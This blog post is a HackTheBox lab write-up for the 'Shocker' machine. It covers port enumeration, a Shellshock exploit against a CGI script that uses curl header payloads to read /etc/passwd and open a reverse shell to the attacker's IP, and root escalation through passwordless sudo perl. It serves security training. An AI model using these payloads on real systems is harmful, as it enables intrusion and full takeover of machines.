HackTheBox - Shocker

Written by Erik on 23 Jun 2021

Linux machine easy level

Enumeration
Explotation
Privilege Escalation

Enumeration:

Ports:

80 HTTP
2222 SSH

Nmap

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

Web Content

WebImage

Fuzzing with dirbuster we found a script in “/cgi-bin/user.sh”

cgi-bin

We found a very common vulnerability, which consists of exploiting the script in /cgi-bin/, known as “shellshock”. The text in the web image makes more sense.

I found this page that helps us to exploit it.

Exploit Here

Explotation:

Use the payload that worked:

curl http://10.10.10.56/cgi-bin/user.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"

TestRCE

Since the payload works for us, we took the opportunity to give ourselves a shell:

curl http://10.10.10.56/cgi-bin/user.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"

And we listen in that port:

RevShell

Privilege Escalation:

In the shelly directory we find the user flag:

user txt

The first thing we usually do is to look at what binaries we can run as root. We found a command that can be run as root and we don’t need a password for it.

sudoers

Look at gtfobins so we can take advantage of it for scaling.

gtfobins

Proceed to exploit it:

sudo perl -e 'exec "/bin/sh";'

GettingRoot

We are root

root txt

Machine Completed

Erik

Hi! Im Erik I love computer security and in my spare time I do bug bounty or research.
Every day I try to learn something new, no matter how small it is.